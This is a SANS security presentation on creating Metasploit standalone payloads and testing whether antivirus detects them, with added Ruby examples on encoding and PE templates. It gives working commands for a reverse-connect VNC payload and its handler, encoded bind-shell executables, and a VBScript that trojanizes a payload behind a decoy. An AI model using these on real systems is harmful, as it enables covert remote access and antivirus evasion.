Metasploit Payloads and Antivirus
Mark Baggett, December 2008 (GIAC GSEC, GCIH)
SANS Technology Institute - Candidate for Master of Science Degree
Slide 2: Objectives
- Learn how an attacker might use Metasploit standalone payloads against you
- See how these payloads are created, used and "trojanized"
- Understand what level of protection to expect from your antivirus

Slide 3: How are they used against you?
- A standalone payload can be executed by tricking a user into running it, or delivered by an exploit that is not in the framework
- Either way it executes on a fully patched system: no unpatched vulnerability is needed, only a way to get code running
- Once running, Meterpreter's advanced functionality is available: anti-forensics, detection evasion and pivoting
Scenario:
- Attacker brute-forces a password on a fully patched machine
- Runs a Meterpreter payload and uses it to pivot
- Uses the framework to attack other hosts on the DMZ

Slide 4: msfpayload
Generates payloads in various formats:
- Source code in C, Perl, Ruby or JavaScript
- Hexadecimal (RAW)
- Binary executable formats for Win32, Linux, and OS X on Intel, PPC and iPhone
The JavaScript output automatically selects big-endian or little-endian byte order depending on the processor the payload targets; you can override this with a simple modification to msfpayload (the js_be and js_le formats)

Slide 5: Demonstration
See how these payloads are created

Slide 6: Interacting with payloads
- Some payloads will not work standalone: find_port and find_tag reuse the socket of the exploit that delivered them, so there is no connection to find when they run on their own
- Bind shell payloads can be used outside of the framework: connect to the listening port with any TCP client
- Reverse-connect payloads (including staged ones such as vncinject and meterpreter) require the exploit/multi/handler module, which listens for the connection and delivers the stage

Slide 7: Using multi/handler
Creation (LHOST is the attacker's IP, the address the payload connects back to; X selects Windows executable output):
  ./msfpayload windows/vncinject/reverse_tcp LHOST=<attacker IP> X > vncrev.exe
Use (the handler listens on the same LHOST and LPORT the payload was built with; E tells msfcli to execute the module):
  ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<attacker IP> DisableCourtesyShell=TRUE E
RHOST (the victim's IP) is set on the handler only when it is paired with a bind payload, where the handler connects out to the victim instead of listening. DisableCourtesyShell=TRUE stops vncinject from popping up its command prompt on the victim's desktop.

Slide 8: Demonstration
See how these payloads are used

Slide 9: msfencode
Encodes a payload using one of several encoders. It expects RAW msfpayload output (the R format) on standard input.
- -h: help
- -l: list the available encoders
- -e: encoder to use
- -t: output type
- -b: bytes the encoded output must avoid (the "bad characters" the delivery path cannot carry, given as escaped hex)
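What -b actually has to guarantee, as an added example (this is not code from the slides or from Metasploit): a single-byte XOR encoder that rejects any key which would leave a bad byte in the output or in the key itself (the decoder stub has to embed the key), plus the check a practitioner runs on the result. x86/shikata_ga_nai is a polymorphic additive-feedback XOR with a real x86 decoder, far more than this, but the key-selection constraint it enforces for -b is the same. The sample payload bytes are constructed to contain every default bad byte; they are not shellcode.

```ruby
# Added example: bad-character avoidance in the spirit of "msfencode -b".
# Not Metasploit code; the sample input is constructed, not real shellcode.

# Default bad bytes: NUL (string-copy overflows), LF and CR (line-based
# protocols). Stored as a binary string like the argument to -b.
BAD_DEFAULT = "\x00\x0a\x0d".b

# Return the bad bytes that occur in +blob+ (an empty array means clean).
def badchars_in(blob, bad = BAD_DEFAULT)
  present = blob.b.bytes
  bad.bytes.select { |b| present.include?(b) }
end

# XOR every byte of +blob+ with the single-byte +key+ (0..255).
# XOR is its own inverse, so the same call decodes.
def xor_bytes(blob, key)
  blob.b.bytes.map { |b| b ^ key }.pack("C*")
end

# Find the first key such that neither the key byte nor any encoded byte is
# in +bad+. Returns [key, encoded], or nil when no single-byte key works
# (msfencode would then fall through to its next encoder and finally fail).
def pick_xor_key(blob, bad = BAD_DEFAULT)
  bad_set = bad.bytes
  (1..255).each do |key|
    next if bad_set.include?(key)          # key itself must be clean
    enc = xor_bytes(blob, key)
    return [key, enc] if badchars_in(enc, bad).empty?
  end
  nil
end

# Constructed sample: bytes chosen so the raw form contains all three default
# bad bytes and so keys 1 through 4 each produce a bad byte; key 5 is clean.
SAMPLE = "\x31\xc0\x00\x50\x0a\x68\x0d\x2f\x01\x0b\x02\x0c\x03\x09".b

if __FILE__ == $0
  puts "raw bad bytes: " + badchars_in(SAMPLE).map { |b| format('\x%02x', b) }.join
  key, enc = pick_xor_key(SAMPLE)
  puts format("key 0x%02x -> %s", key, enc.unpack1("H*"))
  puts "encoded clean: #{badchars_in(enc).empty?}"
  puts "round trip ok: #{xor_bytes(enc, key) == SAMPLE}"
end
```

The same badchars_in check is worth running on msfencode's own output before using it: decode the -t raw result and confirm none of the -b bytes survive, because an encoder that cannot satisfy the constraint reports failure rather than emitting a partially clean buffer.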

Slide 10: msfencode -> Binary
Binary was not a selectable output type from msfencode until September 29th. Before that there were three ways to get an encoded binary:
- Add 3 lines of code to msfencode
- Generate RAW output and use a hex editor to place it in a PE-format binary
- Generate C source code and compile it
Now the -t exe option wraps the encoded payload in a Windows binary

Slide 11: msfencode (continued)
  ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -t exe > bind.exe
  ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x41\x42\x43" -t exe > bind.exe
(-t exe writes the executable to standard output, so redirect it to a file.)
How -t exe builds the binary: Rex::Text.to_win32pe() uses the template executable in data/templates
- It locates the "PAYLOAD:" tag in the template and overwrites the buffer that follows with the payload, so you can use your own binary as the template by giving it a buffer that starts with that tag
- to_win32pe also writes 4 random bytes at file offset 0x88, which in the stock template is the COFF TimeDateStamp field in the PE header; this changes the file's hash on every run but does not relocate the binary
- Roll your own template from template.c
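The template mechanics described above, as an added example imitating what to_win32pe does (this is not Metasploit's Rex::Text.to_win32pe and not code from the slides): the payload is dropped over the "PAYLOAD:" buffer and one header field is randomized, and nothing else changes. The second function is the defender's side of the same fact, relevant to the detection results on slide 14: every byte outside those two regions is identical in every file the template produces, so a scanner that masks them out has a stable signature for the template regardless of payload or encoder. Assumptions: the template is a constructed, minimal PE header (not a runnable program) with e_lfanew = 0x80, which is what puts the timestamp at 0x88; the 8192-byte buffer size and the random-timestamp behaviour follow my recollection of to_win32pe and should be treated as assumptions.

```ruby
# Added example: payload stamping and template fingerprinting.
# Imitates to_win32pe's behaviour; not Metasploit code. The "template" is a
# constructed PE header plus a marker buffer, enough to show the mechanics.

MARKER   = "PAYLOAD:".b
BUF_SIZE = 8192   # assumed size of the marker buffer in the stock template

# Build the constructed template: DOS header with e_lfanew = 0x80, the PE
# signature, a 20-byte COFF header, then the marker buffer.
def build_template
  dos  = "MZ".b + "\x00".b * 58 + [0x80].pack("V")     # e_lfanew lives at 0x3c
  dos += "\x00".b * (0x80 - dos.bytesize)             # pad to the PE signature
  coff = "PE\x00\x00".b +
         [0x14c, 1].pack("vv") +                        # Machine (i386), NumberOfSections
         [0].pack("V") +                                # TimeDateStamp: file offset 0x88
         [0, 0].pack("VV") +                            # PointerToSymbolTable, NumberOfSymbols
         [0, 0x0102].pack("vv")                         # SizeOfOptionalHeader, Characteristics
  dos + coff + MARKER + "\x00".b * (BUF_SIZE - MARKER.bytesize)
end

# Offset of the COFF TimeDateStamp, derived from e_lfanew rather than
# hard-coded: e_lfanew + 4 (signature) + 2 (Machine) + 2 (NumberOfSections).
def timestamp_offset(pe)
  pe.b[0x3c, 4].unpack1("V") + 8
end

# Copy the template, overwrite the marker buffer with the payload, randomize
# the timestamp field. +rng+ is injectable so the result is reproducible.
def stamp_payload(template, code, rng = Random.new)
  raise ArgumentError, "payload exceeds #{BUF_SIZE} bytes" if code.bytesize > BUF_SIZE
  pe = template.b.dup
  bo = pe.index(MARKER) or raise "template has no #{MARKER} marker"
  pe[bo, BUF_SIZE] = [code.b].pack("a#{BUF_SIZE}")    # zero-padded to the buffer size
  pe[timestamp_offset(pe), 4] = [rng.rand(0x100000000)].pack("V")
  pe
end

# Defender's view: does +sample+ equal +template+ everywhere except the
# timestamp and the payload buffer? True means it was produced from this
# template, whatever payload or encoder was used.
def from_template?(sample, template)
  return false unless sample.bytesize == template.bytesize
  ts = timestamp_offset(template)
  bo = template.b.index(MARKER)
  variable = (ts...ts + 4).to_a + (bo...bo + BUF_SIZE).to_a
  (0...template.bytesize).all? do |i|
    variable.include?(i) || sample.getbyte(i) == template.getbyte(i)
  end
end

if __FILE__ == $0
  tpl = build_template
  exe = stamp_payload(tpl, "\x90\x90\xcc".b)           # constructed 3-byte "payload"
  puts format("timestamp field at 0x%x", timestamp_offset(tpl))
  puts "marker gone:      #{!exe.include?(MARKER)}"
  puts "matches template: #{from_template?(exe, tpl)}"
end
```

The from_template? check is the reason a fixed template is a weak place to hide: changing the timestamp defeats hash-based blocklists, but every generated file still carries the template's own code and headers byte for byte, and that is what a signature writer targets.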

Slide 12: Turning payloads into trojans
- IExpress is a self-extracting package builder that comes with Windows XP
- It can create packages that visibly execute a benign host program and invisibly execute a malicious payload
- All you need is a small VBScript that launches the payload with a hidden window
- Trojan packaging only temporarily avoids antivirus

Slide 13: Payload script
The script (run by IExpress after it has extracted both executables; Run's second argument is the window style, the third says whether to wait for the program to exit):
  ' Shell object used to launch programs
  Set WshShell = WScript.CreateObject("WScript.Shell")
  ' Decoy: normal window (style 1), do not wait for it to exit
  WshShell.Run "mspaint.exe", 1, False
  ' Payload: hidden window (style 0), do not wait, so the user only sees Paint
  WshShell.Run "bindshell.exe", 0, False
Quick IExpress demonstration: see how these payloads are "trojanized"

Slide 14: Level of protection to expect from your antivirus
- Expected results: low rate of detection for unencoded payloads and no detection for encoded payloads
- Actual results: no signature detection for either unencoded or encoded payloads; 2 products' heuristics flagged the payloads
- Pauldotcom Episode 125 at the end of September 2008 found 6 systems detected the payload
- My HIPS testing yielded disappointing results
- HD Moore has stated that version 3.2 will generate a new Windows binary that is harder to detect

Slide 15: Summary
- Metasploit is a powerful framework with a diverse set of tools
- Using these tools, attackers can easily create standalone payloads that run on fully patched systems
- Antivirus products do not at this time provide adequate protection against Metasploit payloads
- My paper is in the SANS Reading Room, titled "Effectiveness of Antivirus Detecting Metasploit Payloads"